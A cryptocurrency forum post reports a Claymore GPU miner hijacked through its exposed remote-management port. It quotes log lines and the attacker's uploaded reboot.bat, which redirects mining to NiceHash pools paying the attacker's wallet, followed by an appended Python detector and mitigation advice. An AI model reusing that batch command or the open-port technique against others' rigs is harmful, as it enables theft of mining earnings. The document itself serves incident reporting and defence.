Board: Altcoin Discussion
Re: Beware of Increasingly Sophisticated Malware Infection Attempts
by phila on 14/04/2017, 13:20:27 UTC
My ethmining is being hijacked.

Ok, so this morning after waking up, one of my rigs was mining on nicehash, but I was mining on miningpoolhub and didn't specify a failover. In my logs I discovered a reboot.bat file was uploaded through ethman.exe and run remotely.

I reckon that's why Claymore said in his readme:
"Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!"

I had it on a positive number in order to manage, but how did a hacker get access over the internet to manage my miner? I consider myself paranoid-careful and usually take all precautions. Is this a mistake on my side, or is it just that easy to access someone's EthDcrMiner64 remotely? Does this mean files might be compromised, or is it more like someone has my external IP? Will a VPN make a difference? Any advice is appreciated.

I replaced my Claymore folder with a new one and made most files inside read-only, but how do I know I am not still compromised? How much access does this hacker have now, and what should I do to ensure further safety? As you can see inside the reboot.bat file, the hacker's bitcoin address "1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M" is busy stealing quite a nice sum of equihash at the moment.

02:00:08:453   6f2c   Remote management: file reboot.bat was downloaded
02:00:08:454   6f2c   srv bs: 0
02:00:08:454   6f2c   sent: 40
02:00:09:231   17d8   GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
xxxxxxxxx
xxxxxxxxx
02:00:09:887   397c   ETH: 04/14/17-02:00:09 - New job from europe.ethash-hub.miningpoolhub.com:17020
02:00:09:887   397c   target: 0x0000000112e0be82 (diff: 4000MH), epoch #117
02:00:09:888   397c   ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0, Time: 00:22
02:00:09:888   397c   ETH: GPU0 26.859 Mh/s, GPU1 26.244 Mh/s
02:00:09:889   397c    DCR - Total Speed: 1593.105 Mh/s, Total Shares: 123, Rejected: 1
02:00:09:889   397c    DCR: GPU0 805.781 Mh/s, GPU1 787.324 Mh/s
02:00:10:231   406c   recv: 73
02:00:10:232   406c   srv pck: 73
02:00:10:232   406c   Remote management: file reboot.bat was uploaded
02:00:10:232   406c   srv bs: 0
02:00:10:233   406c   sent: 682
02:00:10:604   7608   recv: 51
xxxxxxxxxx
02:00:13:363   689c   Remote management required restart
02:00:13:364   689c   Rebooting
02:00:13:377   4630   srv bs: 0
02:00:13:377   4630   sent: 210

==================reboot.bat========================
"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" -epool stratum+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -esm 3 -allpools 1 -estale 0 -dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x
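The log excerpt and reboot.bat above show the two things a rig owner wants to catch early: remote-management file uploads and restarts in the miner log, and a start script whose wallet or pool arguments no longer point at the owner's own accounts. The following Python script is an added example written for this thread; it is not phila's code and not part of Claymore's miner. It parses Claymore-style log lines for remote-management events, grades them by how much they can change the rig, and checks a command line for `-ewal`/`-dwal`/`-epool`/`-dpool` values outside an allow-list. The sample log and the sample command line are constructed copies of what the post quotes; the owner wallet and pool host used as the allow-list are placeholders.

```python
import re

# Constructed sample, modelled on the log excerpt quoted in the post
# (timestamps and thread ids copied from it, a redacted line kept as "xxxxxxxxx").
SAMPLE_LOG = """\
02:00:08:453   6f2c   Remote management: file reboot.bat was downloaded
02:00:08:454   6f2c   srv bs: 0
02:00:09:887   397c   ETH: 04/14/17-02:00:09 - New job from europe.ethash-hub.miningpoolhub.com:17020
xxxxxxxxx
02:00:10:232   406c   Remote management: file reboot.bat was uploaded
02:00:10:233   406c   sent: 682
02:00:13:363   689c   Remote management required restart
02:00:13:364   689c   Rebooting
"""

# Constructed sample command line, copied from the reboot.bat quoted in the post.
SAMPLE_BAT = (
    r'"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" '
    '-epool stratum+tcp://daggerhashimoto.hk.nicehash.com:3353 '
    '-ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -esm 3 -allpools 1 -estale 0 '
    '-dpool stratum+tcp://decred.eu.nicehash.com:3354 '
    '-dwal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x'
)

# Claymore log lines: "HH:MM:SS:mmm  <thread id>  <message>".
LOG_LINE = re.compile(r'^(?P<ts>\d{2}:\d{2}:\d{2}:\d{3})\s+(?P<tid>[0-9a-f]+)\s+(?P<msg>.*)$')

# Remote-management messages, graded by impact: an upload rewrites a file in the
# miner directory and a required restart relaunches the miner with it; a download
# only reads a file, which is still worth knowing about.
SEVERITY = [
    ('was uploaded', 'high'),
    ('required restart', 'high'),
    ('was downloaded', 'medium'),
]


def remote_management_events(log_text):
    """Return every remote-management event in Claymore-style log text, in order."""
    events = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or not m.group('msg').startswith('Remote management'):
            continue
        msg = m.group('msg')
        severity = next((sev for needle, sev in SEVERITY if needle in msg), 'low')
        events.append({'ts': m.group('ts'), 'tid': m.group('tid'),
                       'msg': msg, 'severity': severity})
    return events


# Wallet and pool arguments of the miner command line.
ARG_RE = re.compile(r'-(?P<flag>ewal|dwal|epool|dpool)\s+(?P<value>\S+)')


def foreign_config_args(cmdline, allowed_wallets, allowed_pool_hosts):
    """Return (flag, value) pairs whose wallet or pool host is not on the owner's allow-list."""
    findings = []
    for m in ARG_RE.finditer(cmdline):
        flag, value = m.group('flag'), m.group('value')
        if flag in ('ewal', 'dwal'):
            # Some pools take "wallet.worker" or "wallet/worker"; compare the wallet part only.
            wallet = re.split(r'[./]', value)[0]
            if wallet not in allowed_wallets:
                findings.append((flag, value))
        else:
            # "stratum+tcp://host:port" -> "host"
            host = value.split('://', 1)[-1].rsplit(':', 1)[0]
            if host not in allowed_pool_hosts:
                findings.append((flag, value))
    return findings


if __name__ == '__main__':
    for ev in remote_management_events(SAMPLE_LOG):
        print(f"{ev['ts']} thread {ev['tid']} [{ev['severity']}] {ev['msg']}")
    # Placeholder allow-list: the rig owner's own wallet and pool (constructed values).
    owner_wallets = {'OWNER_WALLET_PLACEHOLDER'}
    owner_pools = {'europe.ethash-hub.miningpoolhub.com'}
    for flag, value in foreign_config_args(SAMPLE_BAT, owner_wallets, owner_pools):
        print(f"unexpected -{flag} {value}")
```

Pointed at a real miner log and the rig's start script, the first function gives a timeline of who changed what through the management port, and the second turns "is the rig still mining to me?" into a check that can run after every restart. Neither replaces the fix the post's readme quote names: run remote management read-only with a negative port value (Claymore's `-mport` option) or disable it, and keep that port unreachable from the internet.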